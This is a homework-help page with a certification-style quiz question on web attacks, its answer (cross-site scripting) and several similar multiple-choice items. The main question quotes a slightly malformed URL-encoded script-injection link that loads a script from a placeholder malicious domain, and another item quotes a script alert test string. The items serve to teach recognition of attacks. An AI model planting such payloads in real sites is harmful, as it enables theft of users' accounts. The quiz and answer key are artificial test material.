Mylie, a black-hat hacker, takes advantage of a website vulnerability that displays content including un-sanitized user-provided data from the following code:<a href="http://animals.com/index.html?id=13Cscript%20arc=%22 http://baddomainscom/badscript.js %22%3E%3C/script%3E">See animals</a>Which of the following attacks has she performed?This type of question contains radio buttons and checkboxes for selection of options. Use Tab for navigation and Enter or space to select the option.optionACommand injectionoptionBBuffer overflowoptionCCross-site scriptingoptionDSQL injection
Question
Mylie, a black-hat hacker, takes advantage of a website vulnerability that displays content including un-sanitized user-provided data from the following code:<a href="http://animals.com/index.html?id=13Cscript%20arc=%22 http://baddomainscom/badscript.js %22%3E%3C/script%3E">See animals</a>Which of the following attacks has she performed?This type of question contains radio buttons and checkboxes for selection of options. Use Tab for navigation and Enter or space to select the option.optionACommand injectionoptionBBuffer overflowoptionCCross-site scriptingoptionDSQL injection
Solution
Mylie has performed a Cross-site scripting attack.
Similar Questions
An attacker sends a misleading email with a link containing malicious JavaScript to gain access to a user's account credentials. Which of the following web application attacks is the attacker performing?This type of question contains radio buttons and checkboxes for selection of options. Use Tab for navigation and Enter or space to select the option.optionASlowlorisoptionBXML external entityoptionCSQL injectionoptionDXSS
om, an ethical hacker, is attempting an attack on a web server based on responses to success/failure questions. Which of the following attacks is he attempting in the scenario?This type of question contains radio buttons and checkboxes for selection of options. Use Tab for navigation and Enter or space to select the option.optionASYN floodoptionBSmurfoptionCBlind SQL injectionoptionDTeardrop
Taylor, an ethical hacker, attempts to insert the following test script into the search area on the company's website:<script>alert(" Alpha Testing ")</script>Afterward, when she presses the search button, a pop-up box appears on the screen with the text: "Alpha Testing". What type of attack has Taylor performed on the company's website?This type of question contains radio buttons and checkboxes for selection of options. Use Tab for navigation and Enter or space to select the option.optionAXSSoptionBHeap sprayingoptionCDeauthenticationoptionDSQL injection
Which web attack is a server-side attack? Cross-site request forgery Clickjacking Cross-site scripting SQL injection
What would you call the use of a script to perform a social engineering attack?This type of question contains radio buttons and checkboxes for selection of options. Use Tab for navigation and Enter or space to select the option.optionABaitingoptionBPhishingoptionCPretextingoptionDPiggybacking
Upgrade your grade with Knowee
Get personalized homework help. Review tough concepts in more detail, or go deeper into your topic by exploring other relevant questions.